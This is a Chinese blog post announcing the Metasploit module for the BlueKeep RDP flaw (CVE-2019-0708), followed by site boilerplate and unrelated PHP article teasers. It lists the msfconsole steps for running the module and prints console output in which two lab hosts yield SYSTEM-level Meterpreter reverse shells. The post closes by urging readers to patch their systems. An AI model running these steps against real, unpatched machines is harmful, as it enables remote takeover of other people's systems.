它来了！它来了！MSF更新了CVE-2019-0708利用脚本，注意防护呀！

程序猿 • 2025年11月10日 23:24:52 • 系统教程 • 阅读 1

前言：

十个小时前，MSF更新了CVE-2019-0708漏洞利用模块，在Metasploit下使用，使用便捷。但根据官方显示，该模块仅针对64位的Win7系统和Windows Server 2008 R2，但对于Windows Server 2008 R2也有特定的条件，具体如下：

原文链接：

代码语言：javascript代码运行次数：0运行复制

https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0

进入正题

该模块可以做哪些工作：

验证步骤：

知了zKnown

知了zKnown：致力于信息降噪 / 阅读提效的个人知识助手。

65 查看详情代码语言：javascript代码运行次数：0运行复制

开启msfconsoleuse exploit/rdp/cve_2019_0708_bluekeep_rceset RHOSTS (设置目标主机，64位Win7系统或者 2008 R2)set PAYLOAD 选择需要关联的参数set TARGET 根据你的环境设置更具体的目标验证你是否获取了一个shell验证目标没有崩溃

输出：

代码语言：javascript代码运行次数：0运行复制

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run[*] Exploiting target 192.168.56.101[*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.101:3389   - The target is vulnerable.[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually[*] Exploiting target 192.168.56.105[*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.105:3389   - The target is vulnerable.[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually[*] Exploit completed, but no session was created.msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2target => 2msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run[*] Exploiting target 192.168.56.101[*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.101:3389   - The target is vulnerable.[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.[*] 192.168.56.101:3389 - Surfing channels ...[*] 192.168.56.101:3389 - Lobbing eggs ...[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...[*] Sending stage (206403 bytes) to 192.168.56.101[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500[*] Session 1 created in the background.[*] Exploiting target 192.168.56.105[*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.105:3389   - The target is vulnerable.[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.[*] 192.168.56.105:3389 - Surfing channels ...[*] 192.168.56.105:3389 - Lobbing eggs ...[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...[*] Sending stage (206403 bytes) to 192.168.56.105[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500[*] Session 2 created in the background.msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessionsActive sessions===============  Id  Name  Type                     Information                            Connection  --  ----  ----                     -----------                            ----------  1         meterpreter x64/windows  NT AUTHORITYSYSTEM @ BCOOK-PC         192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101)  2         meterpreter x64/windows  NT AUTHORITYSYSTEM @ WIN-VVEKS0PTPFB  192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)

结尾：

该漏洞，自出来以后，一直备受大家关注，现在更是出了漏洞利用脚本，有需要的朋友赶紧自查自己的系统，进行修复，避免对自己的系统造成不可估计的损失。

以上就是它来了！它来了！MSF更新了CVE-2019-0708利用脚本，注意防护呀！的详细内容，更多请关注创想鸟其它相关文章！

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容，请发送邮件至 chuangxiangniao@163.com 举报，一经查实，本站将立刻删除。
发布者：程序猿，转转请注明出处：https://www.chuangxiangniao.com/p/607336.html

ai bing git win7系统 windows 网络安全

打赏

微信扫一扫

支付宝扫一扫

0 0

关于作者

程序猿签约作者

300.2K 文章

0 评论

1 粉丝

这个人很懒，什么都没有留下～

UML建模工具更新情况（二）

上一篇 2025年11月10日 23:15:38

流氓软件，终于被爆出来了

下一篇 2025年11月10日 23:25:09

好文分享

php如何压缩

PHP 代码压缩方法：使用内置函数 gzcompress() 和 gzdeflate() 进行压缩并使用 base64 编码。使用 Phar 扩展的 Phar::compress() 函数将文件压缩成 Phar 存档。使用第三方库，如 php-compressor、compress 和 zipstr…

程序猿
2025年12月12日
0000
好文分享

如何把网站转化支持php

将网站转化为支持 PHP，需要以下步骤：选择合适的 PHP 版本。安装 PHP。配置 Web 服务器。创建 PHP 文件。编写 PHP 代码。测试网站。部署网站。维护网站。如何将网站转化为支持 PHP 步骤 1：选择合适的 PHP 版本根据网站的需要，选择合适的 PHP 版本。最新版本通常提供更…

程序猿
2025年12月12日
0000
好文分享

php状态码有哪些

PHP 状态码指示响应状态，包含三个数字：响应类型（百位数位）、响应子类型（十位数位）、可选子状态代码（个位数位）。常见状态码包括：1xx 信息响应（例如：100 Continue）2xx 成功响应（例如：200 OK）3xx 重定向响应（例如：301 Moved Permanently）4xx 客…

程序猿
2025年12月12日
0000
好文分享

php面试问哪些东西

PHP 面试考察的内容包括：PHP 语法、数据类型、变量、数组、对象、类控制流、函数、文件处理、数据库交互OOP：类、对象、继承、多态性MVC 架构、框架（Laravel、CodeIgniter）、ORM、SQL版本控制（Git）、部署工具（Docker）性能优化、代码优化、异常处理、安全实践问题解…

程序猿
2025年12月12日
0000
好文分享

哪些网站是php开发

PHP（超文本预处理器）是一种流行的服务器端脚本语言，广泛用于网站开发，包括官方网站、框架和 CMS（如 Laravel、WordPress、Drupal、Joomla、Magento）、代码库和包管理器（如 GitHub、Packagist）、社区和支持（如 Stack Overflow、PHPB…

程序猿
2025年12月12日
0000
好文分享

php需要学哪些技能

成为熟练的 PHP 开发人员，需要掌握以下关键技能：核心 PHP 概念和面向对象编程数据库连接和查询Web 开发基础（HTML、CSS、JavaScript）HTTP 和服务器端编程框架和工具（PHP 框架、Composer、Xdebug 调试器、IDE）数据库管理（SQL、数据库设计）持续集成和部…

程序猿
2025年12月12日
0000
好文分享

php实习需要哪些技能

PHP 实习所需技能为：1. 核心 PHP 能力：扎实的 PHP 基础、OOP 原则、数据结构处理；2. Web 开发知识：熟悉 HTML、CSS、JavaScript、PHP 框架、数据库使用；3. 软件工程实践：遵守代码规范、使用版本控制系统、团队协作；4. 其他技能：问题解决能力、学习热情、沟…

程序猿
2025年12月12日
0000
好文分享

php开发经验有哪些

PHP 开发经验包括：使用 Web 框架构建网站开发后端系统，包括 API、CMS 和电子商务解决方案自动化业务流程和任务构建移动应用程序的后端和 API数据分析和报表生成涉及数据库、版本控制和容器化技术理解 Web 安全最佳实践 PHP 开发经验 PHP 作为一种广泛使用的服务器端脚本语言，在众多…

程序猿
2025年12月12日
0000
好文分享

php源码网站有哪些

问题：列举 PHP 源码网站？回答：PackagistGitHubCodeCanyonLaracastsSmashing MagazinePHPClasses.orgThe PHP ArchiveZend Frameworksymfony.comCakePHP PHP 源码网站有哪些 PHP 源码…

程序猿
2025年12月12日
0000
好文分享

php要学哪些软件

要学习 PHP，需要以下软件：文本编辑器（如 Notepad++）PHP 解释器（从 PHP 官网下载）Web 服务器（如 Apache）数据库管理系统（如 MySQL，可选）开发环境（IDE）（如 PHPStorm，可选）版本控制系统（如 Git，可选）学习PHP所需的软件要学习PHP，需要以…

程序猿
2025年12月12日
0000
好文分享

做php要学哪些

学习 PHP 的核心知识包括：基础知识：HTML、CSS、PHP 语法和数据类型数据库：SQL、数据库连接和数据查询Web 开发：HTTP 协议、表单处理和会话管理其他技能：版本控制、调试、框架和性能优化学习 PHP 所需知识 PHP 是一种广泛使用的服务器端脚本语言，用于创建动态 Web 应用程…

程序猿
2025年12月12日
0000
好文分享

学习php需要哪些内容

学习 PHP 所需内容：Web 开发基础知识：HTML、CSS、JavaScript操作系统命令和文本编辑器核心语法：数据类型、运算符、数组、函数、对象、类PHP 框架：了解原理和工作流程数据库连接：SQL 基础、PDO/MySQLi高级概念：设计模式、RESTful API、性能优化工具和技术：G…

程序猿
2025年12月12日
0000
好文分享

学php要哪些软件

学习 PHP 所需的必备软件包括：文本编辑器或 IDE，如 Visual Studio Code 或 Sublime Text网络服务器，如 Apache 或 NginxPHP 解释器，从 PHP 官方网站下载数据库，如 MySQL 或 PostgreSQL其他推荐软件：版本控制系统、包管理工具、调…

程序猿
2025年12月12日
0000
好文分享

php做过哪些项目

作为一名 PHP 开发人员，我参与过各种 PHP 项目，包括电子商务平台、CMS、社交网络应用程序、API 集成和数据分析仪表板。在这些项目中，我熟练地使用了 Laravel、CodeIgniter、Zend Framework、MySQL、Guzzle HTTP、RESTful API、PHPUn…

程序猿
2025年12月12日
0000
好文分享

做php需要学哪些

成为一名 PHP 开发人员需要掌握以下核心技术和知识：1. PHP 基础语法；2. 数据结构和算法；3. 数据库；4. Web 开发；5. 框架和组件；6. 版本控制；7. 测试；8. 部署。此外，面向对象编程、设计模式、软件工程原则和性能优化技巧等技能也很有帮助。做 PHP 需要学什么？要成为…

程序猿
2025年12月12日
0000
好文分享

建设php网站有哪些

要建立一个 PHP 网站，需要选择合适的服务器，安装 PHP 环境（如 LAMP 栈或 Docker），创建数据库，构建 PHP 应用程序，设计网站前端（集成 HTML、CSS 和 JavaScript），部署网站，并进行持续的维护和安全。建设 PHP 网站：全面指南 1. 选择合适的服务器 Li…

程序猿
2025年12月12日
0000
好文分享

学php需要哪些知道

学习 PHP 前需要掌握以下基础：HTML 和 CSS、编程基础、数据库基础、操作系统基础、文本编辑器、版本控制系统。学习 PHP 所需的基础知识学习 PHP 之前，需要掌握以下基础知识： 1. HTML 和 CSS PHP 是一种服务器端脚本语言，这意味着它在服务器上运行，为客户端生成 HTM…

程序猿
2025年12月12日
0000
好文分享

哪些软件里有PHP

PHP软件支持包含：在线开发环境：phpMyAdmin、Cloud9、Repl.it桌面IDE：NetBeans（带PHP插件）、Eclipse（带PHP插件）、Sublime Text（带PHP插件）命令行工具：PHPStorm、Laravel Homestead、Docker其他软件：Apach…

程序猿
2025年12月12日
0000
好文分享

php模拟登录哪些网站

问题：哪些网站可以使用 PHP 模拟登录？答案：社交媒体网站（Facebook、Twitter、Instagram、LinkedIn）电子商务网站（亚马逊、eBay、Etsy、Shopify）论坛和社区（Reddit、Stack Overflow、GitHub、Discord）新闻网站（纽约时报、华…

程序猿
2025年12月12日
0000
好文分享

成为php需要哪些技能

要成为一名熟练的 PHP 开发人员，需要以下技能：基础技能：HTML、CSS、数据库管理、操作系统基础PHP 语言专业知识：语法、结构、OOP、HTTP 协议PHP 框架知识网站开发技能：前端开发、服务器端开发、测试和调试其他技能：版本控制、Web 服务、开发工具持续学习和改善：持续学习、动手实践、…

程序猿
2025年12月12日
0000

发表回复

登录后才能评论

它来了！它来了！MSF更新了CVE-2019-0708利用脚本，注意防护呀！

关于作者

相关推荐

发表回复